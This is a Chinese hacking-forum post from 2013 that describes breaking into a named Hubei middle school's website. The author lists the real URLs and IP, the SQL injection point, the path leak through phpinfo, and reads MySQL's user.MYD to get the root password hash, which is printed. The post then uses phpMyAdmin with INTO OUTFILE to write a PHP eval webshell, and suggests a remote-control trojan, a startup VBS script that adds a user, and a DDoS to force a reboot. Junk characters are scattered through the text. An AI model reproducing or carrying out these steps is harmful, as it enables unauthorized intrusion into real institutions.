找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2679|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ I: E2 l/ O8 U# V" v
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!" V, u9 t4 Z9 n  N$ f! e

* h8 B& k( ~( L7 K. C/ w- l
4 I( U% U' j% U+ V3 a# M! F! t7 i8 Q6 g  C; w! h
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 9 b+ e  U! B  Y& ?# u
: d* R' T) {+ `8 L. D0 K# \
那么想可以直接写入shell ,getshell有几个条件:
! A) N/ k; H7 D4 ?9 V' D! ^
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF' K) G5 g% K, ]) g7 k9 C/ {% J& B# E

8 B! d6 c' T3 e: z: ^. H试着爆绝对路径:& ~+ t" h  O# P3 W/ e
1./phpMyAdmin/index.php?lang[]=1  
2 [/ r5 f% T3 F2./phpMyAdmin/phpinfo.php  + }. ]1 c0 @' |' h+ Y
3./load_file()  # g4 P6 R7 f4 L  F6 N8 ^) d$ a
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  " g, y$ \: w8 n3 z) J
5./phpmyadmin/libraries/select_lang.lib.php  , v* X- X; V+ k) J
6./phpmyadmin/libraries/lect_lang.lib.php  - s+ e# v6 L  {
7./phpmyadmin/libraries/mcrypt.lib.php   
5 _" C/ E, l! F# n8./phpmyadmin/libraries/export/xls.php  
8 e* P/ ?5 h8 U. p" h% Q8 d( h+ {* A& _# P. Q% {9 E
均不行...........................
' K: S0 ^8 S$ |+ u$ b7 O: f4 j! J# e( x( q, ^. U0 q: E
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
; z2 i* Y5 ?8 \4 l' S4 n/ w' v0 L8 a* o7 M
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin " R" g& A' M9 [

" X$ Q& R/ G! F默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
! n, V; a- |5 L, F4 D/ `7 b6 o/ ^/ R
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
- |9 c; q  E+ [. K5 \! E; J5 M1 R4 T" \
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ( D2 y+ R% J% \# t3 E

8 |* D; j) C2 @, A) vhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini   M* R5 v$ x  S9 B8 A: c
$ o) `9 H1 n% T. Y0 r% v
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 4 J. @; I8 u& S- f

6 C9 N' r3 c* k成功读到root密码:
- r; L1 z' M' D$ X5 r
& X; b( k2 m  V! P5 ]! V17---- r(0072)
3 w1 L0 q3 I) E" n! B4 N/ h- }2 ~18---- o(006f): Y3 ?) Y& X0 R6 [
19---- o(006f)
- N2 S  j5 t; V: F# C# J7 e1 u20---- t(0074)1 A  Y" j5 M2 p, e1 B
21---- *(002a)
3 M* b: S: i6 l22---- 8(0038)
1 @' t" X3 j* Q* N23---- 2(0032)
3 E/ ^9 I/ T" L- w2 N) M" T3 G24---- E(0045)
' h: Y; `9 ?# g' x: Z3 \, }25---- 1(0031)
+ e( `0 L8 _8 Y$ v/ ]" `8 i5 k" t26---- C(0043)8 A7 D2 @0 R+ Y# p
27---- 5(0035)
$ c6 C5 v  c1 X0 }* y2 S28---- 8(0038)
, F- `2 s4 E# _) I* d  _7 \29---- 2(0032)
$ v- z7 h  o' l9 t( X  r0 W# P30---- 8(0038)' X3 P1 A" L5 s: w- j' Q" P
31---- A(0041)
4 r+ }. o' V2 I  j( o32---- 9(0039)$ Z- k; w& O/ C0 v. `$ X
33---- B(0042)
; m) w0 b7 o$ d8 m34---- 5(0035)
5 K( [  d3 g1 b& m( B35---- 4(0034)
1 n/ E& J. i; o1 s4 @36---- 8(0038)
7 c; B9 M/ o& {8 ]: k& V+ X37---- 6(0036)& w7 o, U1 ?0 F$ @
38---- 4(0034)
1 e$ w/ Q' {- t39---- 9(0039)
, \9 a6 A0 N9 C40---- 1(0031)
" k( n0 \2 S& D0 E% y41---- 1(0031)/ I' [- c3 k* i
42---- 5(0035)
. E9 X( u) `7 f0 V7 C43---- 3(0033)6 K8 Y7 A# o2 v) ~5 S" e8 D
44---- 5(0035); K( b4 m) T- b0 t  y- W
45---- 9(0039)
. p1 ?% I5 F- l0 H/ R, W46---- 8(0038). I8 f! f' t' E$ f
47---- F(0046)
4 b9 h% d' c! O! i) _48---- F(0046)" A6 h5 y% ?: n" m
49---- 4(0034): \/ F  i/ K* {
50---- F(0046). v( D. g1 f- m! C/ [
51---- 0(0030)
6 o2 f7 ?& h  A. r; [' z52---- 3(0033)
$ {& b" ~/ v* d: N53---- 2(0032)
# ]; H1 n$ F+ e/ ~, c4 |: q54---- A(0041)0 `# W( U: |6 h
55---- 4(0034)3 o4 c& Y) l9 K! `, s. f
56---- A(0041)
% o% }9 }' B3 R57---- B(0042)
# O" O* R8 N& f. J) @- t' ?58---- *(0044)+ Y$ b" h3 ~: _- T
59---- *(0035)
0 W1 S  x( E6 C) K) E60---- *(0041)1 o: i+ l/ f2 C: @
61---- *0032)8 G  W7 d8 m2 v" c0 {7 B! }

) [1 R; T1 F& L  S) ?解密后成功登陆phpmyamin! e) r5 ~" B/ o. }1 ^( I
                          " H- t1 o6 G/ ^) \6 P
. A* ^# L9 R" @
                             5 H) t- W' L9 h: J+ }' R
6 h* g$ ^% I! m8 U
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
7 ~) O7 ?: l9 d; ^& r0 R5 ^3 s' V$ W% Q0 s
成功执行,拿下shell,菜刀连接:- Q0 y' s) ]/ C  y- b+ S; Y! c
7 V# S  g# Z3 W
服务器不支持asp,aspx,php提权无果...................& X3 L5 S# w, g3 S' y; B

) y( p% c$ b! t3 |2 J/ I* e. D3 x# t但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:) [2 M+ c& S0 B$ T
服务器上已经有个隐藏帐号了
$ P$ r( `# x1 J" n0 J! S
别名     administrators
$ D4 P, K7 c, R2 p注释     管理员对计算机/域有不受限制的完全访问权
4 [7 g. b3 K8 U- U, T5 W$ [3 h- F0 l
成员
4 |$ l1 @* z6 r6 B! O
-------------------------------------------------------------------------------
6 C& K' c( i9 z* Padmin1 [- G# a2 W1 M6 j) Z
Administrator  P' a3 \1 ]& e  P! P7 V! s* l
slipper$- b) C; Z+ r$ s+ i- N
sqluser
3 E3 `  g) s+ w+ L2 W: J命令成功完成。   H& x% m7 j0 ^2 {0 M

0 X5 _; z; a+ C2 w( l3 w4 a  I. M5 a服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。3 G8 N+ x1 v& V! v3 l0 c
  q& S8 f6 {1 ^# i0 u$ {
ddos服务器重启,不然就只能坐等服务器重启了...............................* \! Y" }% C7 f+ {' D7 s

& ?6 X# u7 e: R( m1 Q% @      
$ D4 ?8 i) P2 i- }

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表